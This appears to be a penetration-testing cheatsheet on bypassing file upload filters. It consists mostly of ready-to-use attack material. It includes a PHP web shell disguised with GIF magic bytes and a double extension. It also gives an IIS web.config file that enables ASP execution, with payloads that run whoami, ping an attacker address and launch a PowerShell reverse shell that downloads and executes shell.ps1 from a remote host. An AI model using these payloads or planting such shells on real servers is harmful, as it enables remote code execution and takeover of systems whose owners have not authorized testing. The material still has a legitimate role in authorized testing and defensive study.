Business Logic Testing

File Upload

Cheatsheet

Bypassing Filters

Enumerate allowed extensions

Truncate the file name

Append an allowed extension

  • file.php.png

GIF magic bytes

  • Check allowed file size

  • Check allowed extensions

  • Check Content-Type header

Content-Disposition: form-data; name="myFile"; filename="test.php.png"
Content-Type: image/png

GIF87a
<?php system($_GET['cmd']); ?>

IIS Web Servers

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

  • Upload ASP code within a web.config file.

  • Ensure each line of the ASP payload code is on a new line.

#Save as Web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
<!-- Insert ASP code here (classic ASP, handled by asp.dll) -->
%>
#Payload to test for code execution. This will output sum(1+2)
<%
Response.write(1+2)
%>

#Test for whoami
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

#Payload to test for ping callback
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.4")
o = cmd.StdOut.Readall()
Response.write(o)
%>

tcpdump -i tun0 icmp

#Reverse shell
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('<IP>/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
